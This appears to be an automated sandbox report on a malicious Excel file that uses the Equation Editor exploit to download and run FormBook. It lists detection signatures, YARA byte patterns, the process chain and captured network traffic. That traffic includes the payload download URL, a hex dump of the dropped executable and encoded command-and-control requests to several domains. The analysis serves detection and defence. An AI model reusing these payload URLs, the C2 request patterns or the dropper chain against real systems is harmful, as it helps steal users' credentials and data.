Loading ...

Play interactive tourEdit tour

Analysis Report Order List.xlsx

Overview

General Information

Sample Name:Order List.xlsx
Analysis ID:321137
MD5:b86395637ffd2f1a85acfe7a2f43f8d6
SHA1:f378cb75a5b73b995c78bb0a779488059cc44c44
SHA256:36a4989dba737cef8d0067e2b7a06ad29e5ec9ea96bdb7d3e41cf08af37c8553
Tags:VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2516 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2360 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2880 cmdline: 'C:\Users\Public\vbc.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
      • RegAsm.exe (PID: 2464 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • rundll32.exe (PID: 2440 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • cmd.exe (PID: 1616 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16679:$sqlite3step: 68 34 1C 7B E1
    • 0x1678c:$sqlite3step: 68 34 1C 7B E1
    • 0x166a8:$sqlite3text: 68 38 2A 90 C5
    • 0x167cd:$sqlite3text: 68 38 2A 90 C5
    • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.vbc.exe.49e0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.vbc.exe.49e0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.vbc.exe.49e0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16679:$sqlite3step: 68 34 1C 7B E1
        • 0x1678c:$sqlite3step: 68 34 1C 7B E1
        • 0x166a8:$sqlite3text: 68 38 2A 90 C5
        • 0x167cd:$sqlite3text: 68 38 2A 90 C5
        • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.49e0000.3.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.49e0000.3.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2360, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2880
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.23.212.188, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2360, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2360, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2360, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2880
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2360, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2880
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2360, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2880

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://198.23.212.188/reg/vbc.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 27%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 27%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Order List.xlsxReversingLabs: Detection: 31%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2142112075.00000000049E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2141508462.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2142859441.000000000529B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.49e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.49e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 4.2.vbc.exe.49e0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.RegAsm.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop ebx
          Source: global trafficDNS query: name: www.nanox.ltd
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.212.188:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.23.212.188:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49167
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.22:49172
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 11:05:19 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11Last-Modified: Fri, 20 Nov 2020 08:11:07 GMTETag: "87000-5b48562f86225"Accept-Ranges: bytesContent-Length: 552960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 57 74 b7 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 68 08 00 00 06 00 00 00 00 00 00 8e 86 08 00 00 20 00 00 00 a0 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 08 00 00 02 00 00 70 e7 08 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 86 08 00 4b 00 00 00 00 a0 08 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 66 08 00 00 20 00 00 00 68 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 a0 08 00 00 04 00 00 00 6a 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 86 08 00 00 00 00 00 48 00 00 00 02 00 05 00 70 e6 07 00 d0 9f 00 00 03 00 00 00 10 00 00 06 f0 71 00 00 80 74 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 25 00 00 70 80 04 00 00 0
          Source: global trafficHTTP traffic detected: GET /o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J HTTP/1.1Host: www.alloutdoorspeaker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w== HTTP/1.1Host: www.natcandy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?mL0=pV6faFGE09Anucwtu1kKnRp8occyZHoCKwW13VBtOuBMFJZe4NXXYoNYm7yc9vXPVF34hw==&sFNp=jpX0Lfi0J HTTP/1.1Host: www.californiapropiedades.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA== HTTP/1.1Host: www.pornfilm3d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?mL0=Lg4DNBfwCTdoZLnXKvmswQE2HeXzej7VDwiGjOCQv6fEN8TXR+UTrTnc2v5FsvAKWI4bvw==&sFNp=jpX0Lfi0J HTTP/1.1Host: www.the-trinity-project.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=9OrW47TrMTZH15Vmzbe9TQM6sSr1xjl4p0LLri3wKcTyHbeStzlrAaSeWLbT0hv9vCeuEg== HTTP/1.1Host: www.crimson.schoolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
          Source: Joe Sandbox ViewIP Address: 198.54.117.216 198.54.117.216
          Source: Joe Sandbox ViewASN Name: LIQUIDWEBUS LIQUIDWEBUS
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.188Connection: Keep-Alive
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: unknownTCP traffic detected without corresponding DNS query: 198.23.212.188
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\64EDB67F.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /reg/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.212.188Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /o56q/?mL0=FKXiaoKe3bemDRIUugzxxbPTRBaZLZeqFtxjN0B1OdNP6J3XvAf3eeDn7VbbZMxcUak0EA==&sFNp=jpX0Lfi0J HTTP/1.1Host: www.alloutdoorspeaker.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=kNK7qyUu0ssORWb2BQjm/XfEOCgL/rCBvS1q+B2CMQED5QxzM1Z/xIceLMT4/tikHS2Lng== HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=txyYMtCM76zgLKXk1qYYn+5SCVWoTymC4Fy9/8gvc5WTXTsch9hYV+sG2t1iNylweztP4w== HTTP/1.1Host: www.natcandy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?mL0=pV6faFGE09Anucwtu1kKnRp8occyZHoCKwW13VBtOuBMFJZe4NXXYoNYm7yc9vXPVF34hw==&sFNp=jpX0Lfi0J HTTP/1.1Host: www.californiapropiedades.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?sFNp=jpX0Lfi0J&mL0=B+oguf8ZoLV3WGdfJzBRzAgDmcX+4hJ8FJ+I0/mWlmQn56ZLUkNDQwA/Y9AdAB6o/3r8rA== HTTP/1.1Host: www.pornfilm3d.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
